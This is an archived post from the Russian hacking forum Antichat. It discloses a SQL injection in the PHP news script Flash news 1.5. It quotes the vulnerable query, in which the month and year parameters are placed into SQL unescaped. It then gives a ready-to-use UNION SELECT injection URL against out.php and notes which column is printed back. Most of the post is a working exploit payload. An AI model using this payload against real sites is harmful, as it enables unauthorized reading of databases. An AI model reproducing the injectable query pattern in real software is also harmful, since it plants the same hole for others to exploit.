Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   SQL-inj Flash news 1.5 (https://forum.antichat.xyz/showthread.php?t=138991)

FriLL 02.09.2009 18:48

SQL-inj Flash news 1.5
 
Уязвимый код

PHP код:

if((isset($month))&&(isset($year)))
    {   
//Выбираем из базы по месяцам
        
$mysql="SELECT * FROM $tablename WHERE ((month=$month) AND (year=$year)) ORDER BY date DESC"

expl
out.php?month=09&year=1))-1+union+select+1,2,3,4,5,6+--+

6 поле принтабельное


Время: 21:50